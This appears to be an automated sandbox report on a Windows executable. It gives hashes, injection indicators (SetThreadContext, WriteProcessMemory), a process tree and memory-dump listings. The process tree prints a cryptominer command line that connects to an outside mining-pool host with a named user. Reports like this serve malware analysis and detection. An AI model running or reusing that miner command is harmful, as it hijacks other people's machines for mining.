1ed4ed04dd61ec0e4450719a84706fa1bdafdde5da7ed23f59ff4197994302be

General

Target

cd87551b6afe4d27f4ed400dca025b6e.exe
Size

412KB
MD5

cd87551b6afe4d27f4ed400dca025b6e
SHA1

621b416dd0a563a6825fc3ce210490f811656ef9
SHA256

1ed4ed04dd61ec0e4450719a84706fa1bdafdde5da7ed23f59ff4197994302be
SHA512

1f09d12bacff39672280044e8f76ef295e24444203a2626d4581f35a8fd04d5bc44b661454d671b40da06e4bd9774a1406b5cc76d2710b37a95c2bf02b258c2e
SSDEEP

12288:m/1rVkA1WDLe6uXfTTxFL7x0S6LycA8ljVgW:+dVtWDLA7T7y9yB4jH

Score

5^/10

Malware Config

Signatures

Suspicious use of SetThreadContext 2 IoCs

Processes:

cd87551b6afe4d27f4ed400dca025b6e.execd87551b6afe4d27f4ed400dca025b6e.exe

description	pid	process	target process
PID 2696 set thread context of 3944	2696	cd87551b6afe4d27f4ed400dca025b6e.exe	cd87551b6afe4d27f4ed400dca025b6e.exe
PID 3944 set thread context of 4572	3944	cd87551b6afe4d27f4ed400dca025b6e.exe	cd87551b6afe4d27f4ed400dca025b6e.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

cd87551b6afe4d27f4ed400dca025b6e.exe

pid process

2696 cd87551b6afe4d27f4ed400dca025b6e.exe

pid	process
2696	cd87551b6afe4d27f4ed400dca025b6e.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

cd87551b6afe4d27f4ed400dca025b6e.execd87551b6afe4d27f4ed400dca025b6e.exe

C:\Users\Admin\AppData\Local\Temp\cd87551b6afe4d27f4ed400dca025b6e.exe
"C:\Users\Admin\AppData\Local\Temp\cd87551b6afe4d27f4ed400dca025b6e.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2696

C:\Users\Admin\AppData\Local\Temp\cd87551b6afe4d27f4ed400dca025b6e.exe
C:\Users\Admin\AppData\Local\Temp\cd87551b6afe4d27f4ed400dca025b6e.exe
2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3944

C:\Users\Admin\AppData\Local\Temp\cd87551b6afe4d27f4ed400dca025b6e.exe
mine.exe -a 59 -o http://hdzx.aquarium-stakany.org:8332/ -u darkSons_crypt -p pt
3⤵
PID:4572

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3944-20-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/3944-4-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/3944-48-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/3944-46-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/3944-44-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/3944-42-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/3944-40-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/3944-38-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/3944-36-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/3944-34-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/3944-32-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/3944-2-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/3944-30-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/3944-28-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/3944-26-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/3944-23-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/4572-14-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/4572-35-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/4572-22-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/4572-19-0x0000000000800000-0x0000000000801000-memory.dmp

Filesize
4KB

Download
memory/4572-24-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/4572-25-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/4572-18-0x00000000023A0000-0x00000000023EB000-memory.dmp

Filesize
300KB

Download
memory/4572-27-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/4572-17-0x0000000002410000-0x0000000002415000-memory.dmp

Filesize
20KB

Download
memory/4572-29-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/4572-16-0x0000000002420000-0x0000000002422000-memory.dmp

Filesize
8KB

Download
memory/4572-31-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/4572-13-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/4572-33-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/4572-12-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/4572-21-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/4572-11-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/4572-37-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/4572-10-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/4572-39-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/4572-9-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/4572-41-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/4572-8-0x00000000004FD000-0x0000000000537000-memory.dmp

Filesize
232KB

Download
memory/4572-43-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/4572-7-0x00000000004FD000-0x0000000000537000-memory.dmp

Filesize
232KB

Download
memory/4572-45-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/4572-6-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/4572-47-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/4572-5-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/4572-49-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download

description	pid	process	target process
PID 2696 wrote to memory of 3944	2696	cd87551b6afe4d27f4ed400dca025b6e.exe	cd87551b6afe4d27f4ed400dca025b6e.exe
PID 2696 wrote to memory of 3944	2696	cd87551b6afe4d27f4ed400dca025b6e.exe	cd87551b6afe4d27f4ed400dca025b6e.exe
PID 2696 wrote to memory of 3944	2696	cd87551b6afe4d27f4ed400dca025b6e.exe	cd87551b6afe4d27f4ed400dca025b6e.exe
PID 2696 wrote to memory of 3944	2696	cd87551b6afe4d27f4ed400dca025b6e.exe	cd87551b6afe4d27f4ed400dca025b6e.exe
PID 2696 wrote to memory of 3944	2696	cd87551b6afe4d27f4ed400dca025b6e.exe	cd87551b6afe4d27f4ed400dca025b6e.exe
PID 2696 wrote to memory of 3944	2696	cd87551b6afe4d27f4ed400dca025b6e.exe	cd87551b6afe4d27f4ed400dca025b6e.exe
PID 2696 wrote to memory of 3944	2696	cd87551b6afe4d27f4ed400dca025b6e.exe	cd87551b6afe4d27f4ed400dca025b6e.exe
PID 2696 wrote to memory of 3944	2696	cd87551b6afe4d27f4ed400dca025b6e.exe	cd87551b6afe4d27f4ed400dca025b6e.exe
PID 3944 wrote to memory of 4572	3944	cd87551b6afe4d27f4ed400dca025b6e.exe	cd87551b6afe4d27f4ed400dca025b6e.exe
PID 3944 wrote to memory of 4572	3944	cd87551b6afe4d27f4ed400dca025b6e.exe	cd87551b6afe4d27f4ed400dca025b6e.exe
PID 3944 wrote to memory of 4572	3944	cd87551b6afe4d27f4ed400dca025b6e.exe	cd87551b6afe4d27f4ed400dca025b6e.exe
PID 3944 wrote to memory of 4572	3944	cd87551b6afe4d27f4ed400dca025b6e.exe	cd87551b6afe4d27f4ed400dca025b6e.exe
PID 3944 wrote to memory of 4572	3944	cd87551b6afe4d27f4ed400dca025b6e.exe	cd87551b6afe4d27f4ed400dca025b6e.exe
PID 3944 wrote to memory of 4572	3944	cd87551b6afe4d27f4ed400dca025b6e.exe	cd87551b6afe4d27f4ed400dca025b6e.exe
PID 3944 wrote to memory of 4572	3944	cd87551b6afe4d27f4ed400dca025b6e.exe	cd87551b6afe4d27f4ed400dca025b6e.exe

Analysis

Sharing